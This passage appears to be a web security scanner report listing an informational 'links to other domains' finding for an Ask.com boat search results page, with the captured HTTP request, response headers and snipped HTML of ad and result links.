<a href="http://www.google.com/aclk?sa=l&ai=CUTtEHMtBTeb9KsTQggezmNnqDpyQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGo4fUo4AQkAECoAGA6M38A8gBAaoEGU_Q64TDrOzDM7ube5PrlEnKcpc89cM2jPM&num=4&sig=AGiWqtwbSnNe_PM_tI-BczH7kZ-PFmtCgw&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(79); if (typeof efclk != 'undefined') efclk(79); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'4',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_3');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<td>

<a id="r0_t" href="http://www.oysterharborsregulator.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a001',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" >Oyster Harbors <b>
...[SNIP]...
<td>

<a id="r1_t" href="http://marinesource.com/builders/regulator/search.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a002',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r2_t" href="http://www.boattrader.com/browse/make/regulator"
onmousedown="return fp(this,{en:'te',io:'0',b:'a003',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r3_t" href="http://www.boatquest.com/Regulator/1/allmanufacturerboats.aspx"
onmousedown="return fp(this,{en:'te',io:'0',b:'a004',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r4_t" href="http://www.boatquest.com/Regulator/26/Morehead-City/1/size_manufacturerCityNameBoats.aspx"
onmousedown="return fp(this,{en:'in',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >26 ft. <b>
...[SNIP]...
<td>

<a id="r5_t" href="http://www.boatsafe.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >BoatSafe.com - <b>
...[SNIP]...
<td>

<a id="r6_t" href="http://www.boattest.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r7_t" href="http://www.classicboat.co.uk/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >Home | Classic <b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.boatpartsinfo.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >News and Information on <b>
...[SNIP]...
<td>

<a id="r9_t" href="http://www.boatoregon.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >State of Oregon: Oregon State Marine Board</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C98iXHMtBTeb9KsTQggezmNnqDtvO8tsBk7izyxfr17kIEAEg-_6BAygFUIfc5pcHYMmGo4fUo4AQkAECoAG50r__A8gBAaoEHE_Q26fPrOnDM_Ob5fx49U7GbE2M8atp9Y82XYI&num=1&sig=AGiWqtzoC2Oq3cqcCZAFybGy-hKU6M1cUw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(46); if (typeof efclk != 'undefined') efclk(46); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_0');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=C98iXHMtBTeb9KsTQggezmNnqDtvO8tsBk7izyxfr17kIEAEg-_6BAygFUIfc5pcHYMmGo4fUo4AQkAECoAG50r__A8gBAaoEHE_Q26fPrOnDM_Ob5fx49U7GbE2M8atp9Y82XYI&num=1&sig=AGiWqtzoC2Oq3cqcCZAFybGy-hKU6M1cUw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(46); if (typeof efclk != 'undefined') efclk(46); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_0');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C5hA0HMtBTeb9KsTQggezmNnqDu2R_78Br7bGshWQqMEHEAIg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCQAQKgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Q2-PyrOrDM7ube4LqW2YZEEqA73HZ8edpJP7DdMg&num=2&sig=AGiWqtwTB1uQbvSPSBbr3c9tm7xPiaEyvg&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(17); if (typeof efclk != 'undefined') efclk(17); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_1');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=C5hA0HMtBTeb9KsTQggezmNnqDu2R_78Br7bGshWQqMEHEAIg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCQAQKgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Q2-PyrOrDM7ube4LqW2YZEEqA73HZ8edpJP7DdMg&num=2&sig=AGiWqtwTB1uQbvSPSBbr3c9tm7xPiaEyvg&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(17); if (typeof efclk != 'undefined') efclk(17); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_1');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CLllhHMtBTeb9KsTQggezmNnqDovI34UBp6W4nRCGycIyEAMg-_6BAygFUOz8xg9gyYajh9SjgBCQAQLIAQGqBBxP0Ivk3qzrwzPzm5GeD_JOxmxNjPGrafWPNl2C&num=3&sig=AGiWqtxw3bAghgue01eJRlD_tMyP449zfQ&adurl=http://www.pronto.com/user/search.do%3FdisplayQuery%3Dregulator%2520marine%26SEM%3Dtrue%26query%3Dregulator%2520marine%26adid%3Dy-20070712-286178-358763_gs%26ref%3Dregulator%2520marine%26creativeid%3D4260100443%26site%3D" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(50); if (typeof efclk != 'undefined') efclk(50); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_2');" class="nu" onmouseover="return ss('<b>regulator</b>.pronto.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CLllhHMtBTeb9KsTQggezmNnqDovI34UBp6W4nRCGycIyEAMg-_6BAygFUOz8xg9gyYajh9SjgBCQAQLIAQGqBBxP0Ivk3qzrwzPzm5GeD_JOxmxNjPGrafWPNl2C&num=3&sig=AGiWqtxw3bAghgue01eJRlD_tMyP449zfQ&adurl=http://www.pronto.com/user/search.do%3FdisplayQuery%3Dregulator%2520marine%26SEM%3Dtrue%26query%3Dregulator%2520marine%26adid%3Dy-20070712-286178-358763_gs%26ref%3Dregulator%2520marine%26creativeid%3D4260100443%26site%3D" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(50); if (typeof efclk != 'undefined') efclk(50); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_2');" class="nu" onmouseover="return ss('<b>regulator</b>.pronto.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CUTtEHMtBTeb9KsTQggezmNnqDpyQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGo4fUo4AQkAECoAGA6M38A8gBAaoEGU_Q64TDrOzDM7ube5PrlEnKcpc89cM2jPM&num=4&sig=AGiWqtwbSnNe_PM_tI-BczH7kZ-PFmtCgw&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(74); if (typeof efclk != 'undefined') efclk(74); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_3');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CUTtEHMtBTeb9KsTQggezmNnqDpyQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGo4fUo4AQkAECoAGA6M38A8gBAaoEGU_Q64TDrOzDM7ube5PrlEnKcpc89cM2jPM&num=4&sig=AGiWqtwbSnNe_PM_tI-BczH7kZ-PFmtCgw&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(74); if (typeof efclk != 'undefined') efclk(74); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_3');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=C9W-qHMtBTeb9KsTQggezmNnqDomdlFO5_fqgA8XU-SsQBSD7_oEDKAVQhYnL5gJgyYajh9SjgBCQAQLIAQGqBBlP0KuP0qztwzO7m3uT65RJynKXPPXDNozz&num=5&sig=AGiWqtxBlrPOaZ0ZdaYFlaiT8-erjJT53g&adurl=http://www.sailorman.com/used_gear.php" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(29); if (typeof efclk != 'undefined') efclk(29); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_4');" class="nu" onmouseover="return ss('www.sailorman.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C9W-qHMtBTeb9KsTQggezmNnqDomdlFO5_fqgA8XU-SsQBSD7_oEDKAVQhYnL5gJgyYajh9SjgBCQAQLIAQGqBBlP0KuP0qztwzO7m3uT65RJynKXPPXDNozz&num=5&sig=AGiWqtxBlrPOaZ0ZdaYFlaiT8-erjJT53g&adurl=http://www.sailorman.com/used_gear.php" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(29); if (typeof efclk != 'undefined') efclk(29); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_4');" class="nu" onmouseover="return ss('www.sailorman.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.33. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?qsrc=2990&o=0&l=dir&q=regulator+boat+north+carolina

The response contains the following links to other domains:

http://4.afs.googleadservices.com/images/partners/CIyFzbGM26YCFQvf4AodiBMN9w/aj-cat.png
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=regulator+boat+north+carolina
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://companydatabase.org/c/communications-services-nec/marine-operators/marine-offshore/quality-marine/north-carolina/manufacturing-facility/regulator-marine.html
http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-1296505615?
http://govguru.com/north-carolina/boat-registration
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://www.askkids.com/?o=0&l=dir
http://www.atlanticmarinesales.com/
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html
http://www.google.com/aclk?sa=L&ai=CcR1kV8RBTcz9Kou-gweIp7S4D6n3pJ4B5ZrwpxLfgdAFEAUg-_6BAygFUNvdkej7_____wFgyYaAgKQkyAEBqgQYT9Cot-aj57Dq7Ykv7QHJ0QaBrLbOrU7e&num=5&sig=AGiWqtyla0qgW6YU8dJdxM3oC9nd8PaXgA&adurl=http://www.gatewaymarina.com/ship_store.html
http://www.google.com/aclk?sa=L&ai=Cm47CV8RBTcz9Kou-gweIp7S4D8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QyO3vo-O46wyLTQ9JmSzi2yUCEUU&num=1&sig=AGiWqtyhTC0jFG4wfWy9ja8wUS0dXQ_rbg&adurl=http://www.AtlanticMarineSales.com
http://www.google.com/aclk?sa=l&ai=C8feXV8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUNCLsoUCYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&ctype=4&sig=AGiWqtymI66e1--MkLsq-RQr0NLZqGfy6w&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats
http://www.google.com/aclk?sa=l&ai=CAoI6V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUP_fwIgEYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&ctype=4&sig=AGiWqtw9y8Fbq_siTteLh4EmlzDxcKyd6g&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool
http://www.google.com/aclk?sa=l&ai=CReD1V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QiNPko-Gw6u2JPuwlnrK2VvpZ8778wARqZaqRaw&num=3&ctype=4&sig=AGiWqtwsG6fo1b8kmxFlizRKhNggK1UJLQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing
http://www.google.com/aclk?sa=l&ai=CXuOXV8RBTcz9Kou-gweIp7S4D5yQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGgICkJKABgOjN_APIAQGqBBtP0Piu5aPmsOrtiXbsu_EhDG4KUxwYGRKxPak&num=4&sig=AGiWqtxZnmJeoiny_ZDCkxzEKCH2_jHuLA&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404
http://www.google.com/aclk?sa=l&ai=CeeE_V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUPeXq-oFYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&sig=AGiWqtynVrQkkCY4fAwgSwdvdIKSErEzvw&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts
http://www.google.com/aclk?sa=l&ai=CtkeBV8RBTcz9Kou-gweIp7S4D4621OUB7uvvmhLdt9ykCBACIPv-gQMoBVC5o66U-_____8BYMmGgICkJKAB4Nuj_gPIAQGqBCFP0Pji8aPgsOvtiXbsu-Aga0dR6ctO9i-ij7cfxqfrRJU&num=2&sig=AGiWqtyKihDbkXNH3nuPRKhk30LbgBpTJQ&adurl=http://www.boattrader.com/search-results/State-NC%257CNorth%2520Carolina/NewOrUsed-any/Type-any/Sort-Length:DESC/%3Fcmp%3DGoogle
http://www.google.com/aclk?sa=l&ai=CzU7NV8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUIzAuNf8_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QiNPko-Gw6u2JPuwlnrK2VvpZ8778wARqZaqRaw&num=3&ctype=4&sig=AGiWqtx3dzYD9VjJzB06Vm2EvuA5uN2jfA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture
http://www.marine-world.com/brokers/589.html
http://www.regulatormarine.com/
http://www.regulatormarine.com/quality.html
http://www.starlingmarine.com/
http://www.tunaduck.com/boat.html
http://www.tunaduck.com/links.html

Request

GET /web?qsrc=2990&o=0&l=dir&q=regulator+boat+north+carolina HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=regulator+boat&search=&qsrc=0&o=0&l=dir
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; clc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; qh=1-cmVndWxhdG9yK2JvYXQ.; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5488|0~5489|0~5490|1; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.2.10.1296155592; wz_sid=014DDB4118C033B329ACD8C41BD460F3; cu.wz=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjE1LVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:15:36 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:15:35 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:15:35 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:15:35 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:15:35 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 140746

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=regulator+boat+north+carolina"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
<td>

<a id="r1_t" href="http://www.regulatormarine.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a001',tp:'d',ec:'1',ex:'tsrc%3Dvnru'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...

<img src="http://4.afs.googleadservices.com/images/partners/CIyFzbGM26YCFQvf4AodiBMN9w/aj-cat.png" style="display:none;" height="1px" width="1px" alt=""/>

<span class="T7 fr tp info txt0">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=Cm47CV8RBTcz9Kou-gweIp7S4D8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QyO3vo-O46wyLTQ9JmSzi2yUCEUU&num=1&sig=AGiWqtyhTC0jFG4wfWy9ja8wUS0dXQ_rbg&adurl=http://www.AtlanticMarineSales.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(60); if (typeof efclk != 'undefined') efclk(60); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_0');" class="nu" onmouseover="return ss('www.atlanticmarinesales.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=Cm47CV8RBTcz9Kou-gweIp7S4D8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QyO3vo-O46wyLTQ9JmSzi2yUCEUU&num=1&sig=AGiWqtyhTC0jFG4wfWy9ja8wUS0dXQ_rbg&adurl=http://www.AtlanticMarineSales.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(60); if (typeof efclk != 'undefined') efclk(60); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_0');" class="nu" onmouseover="return ss('www.atlanticmarinesales.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CtkeBV8RBTcz9Kou-gweIp7S4D4621OUB7uvvmhLdt9ykCBACIPv-gQMoBVC5o66U-_____8BYMmGgICkJKAB4Nuj_gPIAQGqBCFP0Pji8aPgsOvtiXbsu-Aga0dR6ctO9i-ij7cfxqfrRJU&num=2&sig=AGiWqtyKihDbkXNH3nuPRKhk30LbgBpTJQ&adurl=http://www.boattrader.com/search-results/State-NC%257CNorth%2520Carolina/NewOrUsed-any/Type-any/Sort-Length:DESC/%3Fcmp%3DGoogle" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(69); if (typeof efclk != 'undefined') efclk(69); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_1');" class="nu" onmouseover="return ss('<b>boat</b>trader.com/<b>North_Carolina</b>')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CtkeBV8RBTcz9Kou-gweIp7S4D4621OUB7uvvmhLdt9ykCBACIPv-gQMoBVC5o66U-_____8BYMmGgICkJKAB4Nuj_gPIAQGqBCFP0Pji8aPgsOvtiXbsu-Aga0dR6ctO9i-ij7cfxqfrRJU&num=2&sig=AGiWqtyKihDbkXNH3nuPRKhk30LbgBpTJQ&adurl=http://www.boattrader.com/search-results/State-NC%257CNorth%2520Carolina/NewOrUsed-any/Type-any/Sort-Length:DESC/%3Fcmp%3DGoogle" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(69); if (typeof efclk != 'undefined') efclk(69); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_1');" class="nu" onmouseover="return ss('<b>boat</b>trader.com/<b>North_Carolina</b>')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

